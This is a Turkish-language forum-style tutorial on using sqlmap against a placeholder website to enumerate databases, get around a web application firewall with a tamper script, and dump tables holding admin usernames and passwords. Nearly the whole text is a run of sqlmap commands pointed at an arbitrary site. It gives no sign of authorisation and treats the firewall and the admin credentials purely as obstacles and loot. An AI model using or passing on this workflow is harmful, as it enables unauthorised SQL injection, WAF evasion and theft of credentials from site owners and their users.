sql çektiğimizde ara ara çeşitli problemler oluşabiliyor. Onun için bu konuya göz atmakta fayda vardır, Öncelikle db deb 
üzerinden başlayacağız. Bunun için "--dbs" komutu kullanılır.

Bir örnek gösterecek olursak;
root@kali:# sqlmap -u siteadı.com/index.php?id=5 --dbs

Burda "-u" ile urlyi tanıttık ve "--dbs" ile de databaseyi çekmeye başladık.

Bu şekilde tararken o da ne bir hata smile.gif) Sakin olun korkmayın hemen hataya bakın.[CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request gibi bir hataysa hemen şu komutu yazıyoruz tekrardan.


root@kali:# sqlmap -u siteadı.com/index.php?id=5 --user-agent --dbs

İlerledik ilerledik. Baktık bidaha hata geldi. Hain WAF. Bu hata için ise "--tamper" komutunu kullaranarak atlatıcaz wafı.

root@kali:# sqlmap -u siteadı.com/index.php?id=5 --user-agent --tamper=greatest --dbs

Ben burda "greatest" adlı tamperi kullandım siz diğer tamperlere ulaşmak için ;

root@kali:# cd /usr/share/sqlmap/tamper

Klasörüne geçiş yaptık ve "ls -l" komutu ile tamperleri görürüz. Tamperi yazarken .py gibi şeyler yazmayın sadece adını yazın.

Devam ediyoruz database adları çıktı. Bundan sonrası basit zaten. Önceklikle database adlarına bakalım bi. "İnformation ...." gibi bi database adı varsa onu almayacagız o boştur boş smile.gif))

Herhangi bi databaseyi aldık. Sonrasında şöyle devam ediyoruz. 

root@kali:# sqlmap -u siteadı.com/index.php?id=5 -D [seçtiğimiz database adı] --tables

Daha sonra tabloları çektik. Tablolardan bakıyoruz. User,admin kısacası admin paneli giriş için gerekli olan bilgileri barındıran tabloyu seçip şu komutu yazıyoruz.

root@kali:# sqlmap -u siteadı.com/index.php?id=5 -D [Database adı] -T [Tablo adı] --columns

Şimdi gene bir tablo çıktı ekrana. Bakıyoruz id,pass,password,username gibi isimler var. Şimdi en son yere geldik. Hadi yazalım komutu

root@kali:# sqlmap -u siteadı.com/index.php?id=5 -D [Database adı] -T [Tablo adı] -C [Seçtiğimiz admin,user,password gibi yerlerin adı] --dump

Ve şimdi işimiz bitti kolay gelsin.